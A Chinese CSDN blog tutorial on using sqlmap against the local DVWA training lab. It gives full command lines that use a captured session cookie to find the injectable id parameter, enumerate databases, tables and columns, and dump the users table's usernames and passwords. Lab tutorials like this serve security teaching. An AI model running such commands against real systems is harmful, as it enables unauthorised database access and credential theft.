sqlmap工具的使用(DVWA)

本文详细介绍了SQL注入工具SQLMap的使用,包括下载安装、基本参数、数据库探测、表和字段枚举等步骤。通过实例演示了在DVWA靶场中进行SQL注入的过程,展示了如何利用SQLMap获取数据库信息、表名、字段及数据内容。同时,强调了在进行SQL注入测试时,如需登录则需提供Cookie信息。
摘要由CSDN通过智能技术生成

sqlmap详细内容建议点击下方链接

sqlmap简介·下载及安装·sql使用参数详解·sqlmap进行sql注入常规使用步骤·常规细节知识点

使用sqlmap进行SQL注入的基本步骤

  • 查看sqlmap相关参数,命令格式为:sqlmap -h
  • 找到一个可利用的网址,判断网站数据库类型,命令格式为:sqlmap -u
  • 确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap -u 目标网址–dbs
  • 查看数据库中存在的表,命令格式为:sqlmap -u 目标网址–tables -D 数据库名
  • 获取表中的字段,命令格式为:sqlmap -u 目标网址– columns -T 表名 -D 数据库名
  • 猜解出字段,查看表里的存储内容,命令格式为:sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名

在这之前有几个小知识点

  • sqlmap需要我们输入参数,其中最重要的参数是SQL注入的目标地址。首先要判断测试的目标地址是否需要登录,如果需要登录,则将登陆的Cookie作为参数传递给sqlmap。
    • python sqlmap.py -u “目标地址” --cookie=“cookie值” --batch
  • –batch用来指明自动化操作,否则每一个步骤都需要确认;
  • –current-bd查看当前数据库名称
  • -D DB 指定要枚举的 DBMS 数据库
  • -T TBL 指定要枚举的 DBMS 数据表
  • -C COL 指定要枚举的 DBMS 数据列
  • -X EXCLUDECOL 指定要排除的 DBMS 数据列
  • -U USER 指定枚举的 DBMS 用户

DVWA 之SQL Injection

  • 先判断测试的目标网址是否需要登录,如果需要登录,将登录的cookie传给sqlmap

    • 因为DVWA需要登录,所以需要将登陆的Cookie作为参数传递给sqlmap
    • 输入user ID为1,然后用burpsuite进行拦截,得到cookie值
      在这里插入图片描述
    • 启动python sqlmap.py
    • 输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch
      在这里插入图片描述
      可以看到id处存在SQL注入
  • 查看数据库信息
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --dbs
    在这里插入图片描述

  • 查看当前数据库名称
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --current -db
    在这里插入图片描述
    可以看到当前数据库名称为dvwa

  • 查看数据库中的所有表
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa --tables
    在这里插入图片描述

  • 查看dvwa数据库中users表中的字段
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users --columns
    在这里插入图片描述

  • 将users表中的password和user字段的所有信息测试出来
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users -C “user,password” --dump
    在这里插入图片描述
    得到用户名与密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值